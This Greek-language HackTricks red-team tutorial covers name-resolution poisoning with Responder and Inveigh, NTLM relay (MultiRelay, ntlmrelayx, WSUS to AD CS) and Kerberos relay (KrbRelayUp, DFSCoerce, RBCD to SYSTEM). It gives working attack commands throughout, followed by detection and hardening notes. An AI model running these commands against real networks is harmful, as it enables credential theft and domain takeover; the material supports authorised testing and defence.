Spoofing LLMNR, NBT-NS, mDNS/DNS και WPAD and Relay Attacks

Reading time: 15 minutes

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Πρωτόκολλα Δικτύου

Πρωτόκολλα τοπικής επίλυσης ονομάτων

LLMNR, NBT-NS, and mDNS:
Τα Microsoft και άλλα λειτουργικά συστήματα χρησιμοποιούν LLMNR και NBT-NS για τοπική επίλυση ονομάτων όταν το DNS αποτυγχάνει. Παρομοίως, τα Apple και Linux συστήματα χρησιμοποιούν mDNS.
Αυτά τα πρωτόκολλα είναι ευπαθή σε υποκλοπή και spoofing λόγω της μη-επαληθευμένης, broadcast φύσης τους πάνω από UDP.
Responder μπορεί να χρησιμοποιηθεί για να υποδυθεί υπηρεσίες στέλνοντας ψευδείς απαντήσεις σε hosts που κάνουν ερωτήματα σε αυτά τα πρωτόκολλα.
Περαιτέρω πληροφορίες για service impersonation χρησιμοποιώντας Responder υπάρχουν here.

Web Proxy Auto-Discovery Protocol (WPAD)

Το WPAD επιτρέπει στους browsers να εντοπίζουν αυτόματα τις ρυθμίσεις proxy.
Η ανακάλυψη γίνεται μέσω DHCP, DNS ή fallback σε LLMNR και NBT-NS εάν το DNS αποτύχει.
Το Responder μπορεί να αυτοματοποιήσει WPAD επιθέσεις, κατευθύνοντας clients σε κακόβουλους WPAD servers.

Responder για Protocol Poisoning

Responder είναι ένα εργαλείο που χρησιμοποιείται για poisoning ερωτημάτων LLMNR, NBT-NS και mDNS, απαντώντας επιλεκτικά βάσει τύπου ερωτήματος, στοχεύοντας κυρίως υπηρεσίες SMB.
Έρχεται προεγκατεστημένο στο Kali Linux, και ρυθμίζεται στο /etc/responder/Responder.conf.
Το Responder εμφανίζει τα αιχμαλωτισμένα hashes στην οθόνη και τα αποθηκεύει στον κατάλογο /usr/share/responder/logs.
Υποστηρίζει τόσο IPv4 όσο και IPv6.
Η Windows έκδοση του Responder είναι διαθέσιμη here.

Εκτέλεση Responder

Για να τρέξετε το Responder με τις προεπιλεγμένες ρυθμίσεις: responder -I <Interface>
Για πιο επιθετική διερεύνηση (με πιθανές παρενέργειες): responder -I <Interface> -P -r -v
Τεχνικές για να συλλάβετε NTLMv1 challenges/responses για ευκολότερο cracking: responder -I <Interface> --lm --disable-ess
WPAD impersonation μπορεί να ενεργοποιηθεί με: responder -I <Interface> --wpad
Τα NetBIOS requests μπορούν να επιλυθούν στη διεύθυνση IP του επιτιθέμενου, και να στηθεί ένας authentication proxy: responder.py -I <interface> -Pv

DHCP Poisoning με Responder

Το spoofing των DHCP απαντήσεων μπορεί να δηλητηριάσει μόνιμα τις πληροφορίες δρομολόγησης ενός θύματος, προσφέροντας μια πιο stealthy εναλλακτική έναντι του ARP poisoning.
Απαιτεί ακριβή γνώση της διαμόρφωσης του στοχευόμενου δικτύου.
Εκτέλεση της επίθεσης: ./Responder.py -I eth0 -Pdv
Αυτή η μέθοδος μπορεί να συλλάβει αποτελεσματικά NTLMv1/2 hashes, αλλά χρειάζεται προσεκτικό χειρισμό για να αποφευχθεί η διακοπή του δικτύου.

Συλλογή credentials με Responder

Το Responder θα υποδυθεί υπηρεσίες χρησιμοποιώντας τα προαναφερθέντα πρωτόκολλα, συλλαμβάνοντας credentials (συνήθως NTLMv2 Challenge/Response) όταν ένας χρήστης προσπαθεί να αυθεντικοποιηθεί απέναντι στις spoofed υπηρεσίες.
Μπορούν να γίνουν προσπάθειες για downgrade σε NetNTLMv1 ή απενεργοποίηση ESS για ευκολότερο cracking των credentials.

Είναι κρίσιμο να σημειωθεί ότι η εφαρμογή αυτών των τεχνικών πρέπει να γίνεται νόμιμα και ηθικά, εξασφαλίζοντας κατάλληλη εξουσιοδότηση και αποφεύγοντας διαταραχή ή μη εξουσιοδοτημένη πρόσβαση.

Το Inveigh είναι ένα εργαλείο για penetration testers και red teamers, σχεδιασμένο για Windows συστήματα. Προσφέρει λειτουργίες παρόμοιες με το Responder, πραγματοποιώντας spoofing και man-in-the-middle επιθέσεις. Το εργαλείο εξελίχθηκε από ένα PowerShell script σε ένα C# binary, με τα Inveigh και InveighZero ως τις κύριες εκδόσεις. Λεπτομερείς παράμετροι και οδηγίες βρίσκονται στο wiki.

Το Inveigh μπορεί να λειτουργήσει μέσω PowerShell:

bash

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ή εκτελεστεί ως C# binary:

bash

Inveigh.exe

NTLM Relay Attack

Αυτή η επίθεση εκμεταλλεύεται τις SMB συνεδρίες αυθεντικοποίησης για πρόσβαση σε έναν στόχο, παρέχοντας system shell αν επιτύχει. Βασικές προαπαιτήσεις περιλαμβάνουν:

Ο χρήστης που αυθεντικοποιείται πρέπει να έχει Local Admin πρόσβαση στον relayed host.
Το SMB signing πρέπει να είναι απενεργοποιημένο.

445 Προώθηση θυρών και τούνελ

Σε περιπτώσεις όπου η άμεση δικτυακή πρόσβαση δεν είναι εφικτή, η κυκλοφορία στην πόρτα 445 πρέπει να προωθηθεί και να περάσει μέσω τούνελ. Εργαλεία όπως το PortBender βοηθούν στην ανακατεύθυνση της κυκλοφορίας της πόρτας 445 σε άλλη θύρα, κάτι που είναι απαραίτητο όταν υπάρχει Local Admin πρόσβαση για το φόρτωμα του driver.

PortBender setup and operation in Cobalt Strike:

bash

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Άλλα εργαλεία για NTLM Relay Attack

Metasploit: Ρυθμίζεται με proxies, λεπτομέρειες τοπικού και απομακρυσμένου host.
smbrelayx: Ένα Python script για relaying SMB sessions και εκτέλεση εντολών ή ανάπτυξη backdoors.
MultiRelay: Ένα εργαλείο από το Responder suite για relay συγκεκριμένων ή όλων των χρηστών, εκτέλεση εντολών ή dump hashes.

Κάθε εργαλείο μπορεί να ρυθμιστεί να λειτουργεί μέσω SOCKS proxy αν χρειάζεται, επιτρέποντας επιθέσεις ακόμα και με έμμεση πρόσβαση στο δίκτυο.

Λειτουργία MultiRelay

Το MultiRelay εκτελείται από τον /usr/share/responder/tools κατάλογο, στοχεύοντας συγκεκριμένα IPs ή users.

bash

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Αυτά τα εργαλεία και οι τεχνικές αποτελούν ένα ολοκληρωμένο σύνολο για τη διεξαγωγή NTLM Relay επιθέσεων σε διάφορα δικτυακά περιβάλλοντα.

Κατάχρηση WSUS HTTP (8530) για NTLM Relay προς LDAP/SMB/AD CS (ESC8)

Οι WSUS clients αυθεντικοποιούνται στον update server τους χρησιμοποιώντας NTLM πάνω από HTTP (8530) ή HTTPS (8531). Όταν το HTTP είναι ενεργοποιημένο, οι περιοδικοί έλεγχοι των clients μπορούν να εξαναγκαστούν ή να υποκλαπούν στο τοπικό τμήμα και να αναμεταδοθούν με ntlmrelayx σε LDAP/LDAPS/SMB ή AD CS HTTP endpoints (ESC8) χωρίς να σπάνετε hashes. Αυτό συγχέεται με τη συνηθισμένη κυκλοφορία ενημερώσεων και συχνά αποφέρει αυθεντικοποιήσεις λογαριασμών μηχανών (HOST$).

Τι να αναζητήσετε

Ρυθμίσεις GPO/registry κάτω από HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate και ...\WindowsUpdate\AU:
WUServer (π.χ., http://wsus.domain.local:8530)
WUStatusServer (reporting URL)
UseWUServer (1 = WSUS; 0 = Microsoft Update)
DetectionFrequencyEnabled και DetectionFrequency (ώρες)
WSUS SOAP endpoints που χρησιμοποιούν οι clients μέσω HTTP:
/ClientWebService/client.asmx (approvals)
/ReportingWebService/reportingwebservice.asmx (status)
Προεπιλεγμένες θύρες: 8530/tcp HTTP, 8531/tcp HTTPS

Αναγνώριση

Χωρίς αυθεντικοποίηση
Σάρωση για listeners: nmap -sSVC -Pn --open -p 8530,8531 -iL
Sniff HTTP WSUS traffic μέσω L2 MITM και καταγραφή ενεργών clients/endpoints με wsusniff.py (HTTP μόνο εκτός αν μπορέσετε να κάνετε τους clients να εμπιστευτούν το TLS cert σας).
Με αυθεντικοποίηση
Ανάλυση SYSVOL GPOs για WSUS keys με MANSPIDER + regpol (το wrapper wsuspider.sh συνοψίζει WUServer/WUStatusServer/UseWUServer).
Ερωτήματα σε endpoints σε κλίμακα από hosts (NetExec) ή τοπικά: nxc smb -u -p -M reg-query -o PATH="HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" KEY="WUServer" reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate

Βήματα ολοκληρωμένου HTTP relay

Τοποθετηθείτε για MITM (ίδιο L2) ώστε ένας client να επιλύει τον WSUS server σε εσάς (ARP/DNS poisoning, Bettercap, mitm6, κ.λπ.). Παράδειγμα με arpspoof: arpspoof -i -t <wsus_client_ip> <wsus_server_ip>
Ανακατευθύνετε την πόρτα 8530 στον listener του relay σας (προαιρετικό, βολικό): iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 8530 iptables -t nat -L PREROUTING --line-numbers
Ξεκινήστε ntlmrelayx με τον HTTP listener (απαιτεί υποστήριξη Impacket για HTTP listener; δείτε τα PRs παρακάτω): ntlmrelayx.py -t ldap:// -smb2support -socks --keep-relaying --http-port 8530

Άλλοι κοινοί στόχοι:

Relay σε SMB (αν το signing είναι off) για exec/dump: -t smb://
Relay σε LDAPS για αλλαγές στον κατάλογο (π.χ., RBCD): -t ldaps://
Relay σε AD CS web enrollment (ESC8) για να δημιουργήσετε ένα cert και στη συνέχεια να αυθεντικοποιηθείτε μέσω Schannel/PKINIT: ntlmrelayx.py --http-port 8530 -t http:///certsrv/certfnsh.asp --adcs --no-http-server Για βαθύτερα μονοπάτια κατάχρησης AD CS και εργαλεία, δείτε τη σελίδα AD CS:

AD CS Domain Escalation

Προκαλέστε έναν client check-in ή περιμένετε το προγραμματισμένο. Από έναν client: wuauclt.exe /detectnow ή χρησιμοποιήστε το Windows Update UI (Check for updates).
Χρησιμοποιήστε τις αυθεντικοποιημένες SOCKS συνεδρίες (αν χρησιμοποιήσατε -socks) ή τα άμεσα αποτελέσματα relay για post-exploitation (αλλαγές LDAP, εντολές SMB, ή έκδοση πιστοποιητικού AD CS για μετέπειτα αυθεντικοποίηση).

Περιορισμός HTTPS (8531)

Η παθητική υποκλοπή του WSUS πάνω από HTTPS είναι αναποτελεσματική εκτός αν οι clients εμπιστεύονται το πιστοποιητικό σας. Χωρίς ένα έμπιστο cert ή άλλη θραύση TLS, το NTLM handshake δεν μπορεί να συλλεχθεί/αναμεταδοθεί από την κίνηση WSUS HTTPS.

Σημειώσεις

Το WSUS ανακοινώθηκε ως deprecated αλλά παραμένει ευρέως αναπτυγμένο; το HTTP (8530) εξακολουθεί να είναι κοινό σε πολλά περιβάλλοντα.
Χρήσιμοι βοηθοί: wsusniff.py (παρατήρηση HTTP WSUS check-ins), wsuspider.sh (εντοπισμός WUServer/WUStatusServer από GPOs), NetExec reg-query σε κλίμακα.
Το Impacket επανέφερε την υποστήριξη HTTP listener για ntlmrelayx στο PR #2034 (πρωτοεμφανίστηκε αρχικά στο PR #913).

Εξαναγκασμός NTLM συνδέσεων

Στα Windows μπορεί να έχετε τη δυνατότητα να εξαναγκάσετε ορισμένους privileged λογαριασμούς να αυθεντικοποιηθούν σε αυθαίρετες μηχανές. Δείτε την παρακάτω σελίδα για να μάθετε πώς:

Force NTLM Privileged Authentication

Kerberos Relay attack

Μια Kerberos relay attack κλέβει ένα AP-REQ ticket από μια υπηρεσία και το επαναχρησιμοποιεί απέναντι σε μια δεύτερη υπηρεσία που μοιράζεται το ίδιο computer-account key (επειδή και τα δύο SPNs ανήκουν στον ίδιο $ machine account). Αυτό λειτουργεί ακόμα και αν οι κλάσεις υπηρεσίας των SPNs διαφέρουν (π.χ. CIFS/ → LDAP/) επειδή το κλειδί που αποκρυπτογραφεί το ticket είναι το NT hash της μηχανής, όχι το ίδιο το SPN string, και το SPN string δεν είναι μέρος της υπογραφής.

Σε αντίθεση με το NTLM relay, το άλμα περιορίζεται στον ίδιο host αλλά, αν στοχεύσετε ένα πρωτόκολλο που σας επιτρέπει να γράψετε σε LDAP, μπορείτε να αλυσοδέσετε σε Resource-Based Constrained Delegation (RBCD) ή AD CS enrollment και να αποκτήσετε NT AUTHORITY\SYSTEM με ένα μόνο χτύπημα.

Για λεπτομερείς πληροφορίες γι’ αυτή την επίθεση δείτε:

Token	Purpose	Relay relevance
TGT / AS-REQ ↔ REP	Αποδεικνύει τον χρήστη στο KDC	απείραχτο
Service ticket / TGS-REQ ↔ REP	Δεσμευμένο σε ένα SPN; κρυπτογραφημένο με το κλειδί του ιδιοκτήτη του SPN	εναλλάξιμο αν τα SPNs μοιράζονται τον ίδιο λογαριασμό
AP-REQ	Ο client στέλνει `TGS` στην υπηρεσία	αυτό που κλέβουμε & επαναπαίζουμε

Τα tickets κρυπτογραφούνται με το password-derived key του λογαριασμού που κατέχει το SPN.
Ο Authenticator μέσα στο AP-REQ έχει σφραγίδα χρόνου 5 λεπτών· η επανάληψη μέσα σε αυτό το παράθυρο είναι έγκυρη μέχρι η cache της υπηρεσίας να δει διπλότυπο.
Τα Windows σπάνια ελέγχουν αν το SPN string στο ticket ταιριάζει με την υπηρεσία που στοχεύετε, οπότε ένα ticket για CIFS/HOST συνήθως αποκρυπτογραφείται κανονικά σε LDAP/HOST.

1. Τι πρέπει να ισχύει για να γίνει Kerberos relay

Shared key: τα source και target SPNs ανήκουν στον ίδιο computer account (προεπιλογή σε Windows servers).
No channel protection: SMB/LDAP signing απενεργοποιημένο και EPA απενεργοποιημένο για HTTP/LDAPS.
Μπορείτε να υποκλέψετε ή να εξαναγκάσετε αυθεντικοποίηση: LLMNR/NBNS poison, DNS spoof, PetitPotam / DFSCoerce RPC, fake AuthIP, rogue DCOM, κ.λπ.
Η πηγή του ticket να μην έχει ήδη χρησιμοποιηθεί: πρέπει να κερδίσετε τη “κούρσα” πριν φτάσει το πραγματικό πακέτο ή να το μπλοκάρετε εντελώς· αλλιώς η cache επαναλήψεων του server πυροδοτεί Event 4649.
Πρέπει κάπως να μπορείτε να εκτελέσετε ένα MitM στην επικοινωνία, για παράδειγμα να είστε μέρος του group DNSAmins για να τροποποιήσετε το DNS του domain ή να μπορείτε να αλλάξετε το HOST file του θύματος.

Kerberos Relay Steps

3.1 Recon the host

powershell

# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName

3.2 Εκκινήστε το relay listener

KrbRelayUp

powershell

# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8

KrbRelayUp συνδυάζει KrbRelay → LDAP → RBCD → Rubeus → SCM bypass σε ένα binary.

3.3 Coerce Kerberos auth

powershell

# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50

DFSCoerce προκαλεί τον DC να στείλει ένα Kerberos CIFS/DC01 ticket σε εμάς.

3.4 Relay the AP-REQ

KrbRelay εξάγει το GSS blob από SMB, το επανασυσκευάζει σε ένα LDAP bind, και το προωθεί στο ldap://DC01—η αυθεντικοποίηση επιτυγχάνει επειδή το ίδιο κλειδί το αποκρυπτογραφεί.

3.5 Abuse LDAP ➜ RBCD ➜ SYSTEM

powershell

# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe

You now own NT AUTHORITY\SYSTEM.

Περαιτέρω μονοπάτια που αξίζει να γνωρίζετε

Vector	Trick	Why it matters
AuthIP / IPSec	Ο ψεύτικος server στέλνει ένα GSS-ID payload με οποιοδήποτε SPN; ο client δημιουργεί ένα AP-REQ κατευθείαν προς εσάς	Λειτουργεί ακόμα και μεταξύ υποδικτύων; διαπιστευτήρια μηχανής από προεπιλογή
DCOM / MSRPC	Κακόβουλος OXID resolver αναγκάζει τον client να auth σε αυθαίρετο SPN και port	Καθαρό local priv-esc; παρακάμπτει firewall
AD CS Web Enroll	Relay machine ticket στο `HTTP/CA` και πάρτε ένα cert, έπειτα PKINIT για να δημιουργήσετε TGTs	Παρακάμπτει τις άμυνες LDAP signing
Shadow Credentials	Γράψτε `msDS-KeyCredentialLink`, έπειτα PKINIT με πλαστό ζεύγος κλειδιών	Δεν χρειάζεται να προσθέσετε λογαριασμό υπολογιστή

Αντιμετώπιση προβλημάτων

Error	Meaning	Fix
`KRB_AP_ERR_MODIFIED`	Ticket key ≠ target key	Wrong host/SPN
`KRB_AP_ERR_SKEW`	Clock > 5 min offset	Sync time or use `w32tm`
LDAP bind fails	Signing enforced	Use AD CS path or disable signing
Event 4649 spam	Service saw duplicate Authenticator	block or race original packet

Ανίχνευση

Αύξηση σε Event 4769 για CIFS/, HTTP/, LDAP/ από την ίδια πηγή μέσα σε δευτερόλεπτα.
Event 4649 στην υπηρεσία υποδεικνύει ανίχνευση replay.
Kerberos logon από 127.0.0.1 (relay to local SCM) είναι πολύ ύποπτο — map via Sigma rule in KrbRelayUp docs.
Παρακολουθήστε αλλαγές στα attributes msDS-AllowedToActOnBehalfOfOtherIdentity ή msDS-KeyCredentialLink.

Σκληρυνση

Enforce LDAP & SMB signing + EPA σε κάθε διακομιστή.
Διαχωρίστε τα SPNs ώστε το HTTP να μην είναι στον ίδιο λογαριασμό με CIFS/LDAP.
Κάντε patch στους coercion vectors (PetitPotam KB5005413, DFS, AuthIP).
Ορίστε ms-DS-MachineAccountQuota = 0 για να σταματήσουν οι μη εξουσιοδοτημένες εγγραφές υπολογιστών.
Ειδοποίηση σε Event 4649 και απροσδόκητα loopback Kerberos logons.

References

tip

Υποστηρίξτε το HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.